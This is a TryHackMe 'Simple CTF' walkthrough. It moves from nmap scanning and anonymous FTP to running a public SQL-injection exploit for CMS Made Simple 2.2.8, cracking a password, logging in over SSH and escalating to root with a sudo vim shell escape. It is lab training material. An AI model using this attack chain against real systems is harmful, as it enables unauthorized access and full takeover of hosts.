TryHackMe: Simple CTF

1. Port scan

nmap -Pn <ip>

2. Scan for services and OS detection

nmap -A -p 21,80,2222 <ip>

There’re 3 services:
- 21 vsftpd 3.0.3 w/ anonymous login
- 80 Apache httpd 2.4.18 w/ robots.txt file
- 2222 OpenSSH 7.2p2

OS: Ubuntu

3. Vulnerable scan

nmap --script vuln -p 21,80,2222 <ip>

/robots.txt again

4. Access FTP w/ anonymous login

ftp <ip>
anonymous

ls
cd pub

ls

get ForMitch.txt
exit

Read ForMitch.txt

cat ForMitch.txt

Seems like this “mitch” person has the same password everywhere and easily cracked.

5. Access HTTP site

http://<ip>/

Nothing much useful.

Access robots.txt

http://<ip>/robots.txt

Access openemr path

http://<ip>/openemr-5_0_1_3

Nothing

Let’s find directory with dirb

dirb http://<ip>

Access /simple/

http://<ip>/simple/

It’s cmsms or cms made simple.

version 2.2.8

Search for exploits

searchsploit cms made simple 2.2.8

Copy the script

searchsploit -m 46635

Review the script for usage. Seems like I can do sql injection and crack for credentials.

Run the script

python 46635.py -u http://<ip>/simple/ --crack -w rockyou.txt

Try to login to CMS

http://<ip>/simple/admin

Failed!!!

Let’s try with mitch:secret

6. Access SSH. Since “mitch” uses same credential everywhere, It’s worth a try.

ssh mitch@<ip> -p 2222

ls 
cat user.txt

7. Privilege escalation

Check if I can run sudo

sudo -l

I can run with vim

Command reference: https://gtfobins.github.io/gtfobins/vim/

sudo vim -c ':!/bin/sh'

Now I’m root

cd /root
ls
cat root.txt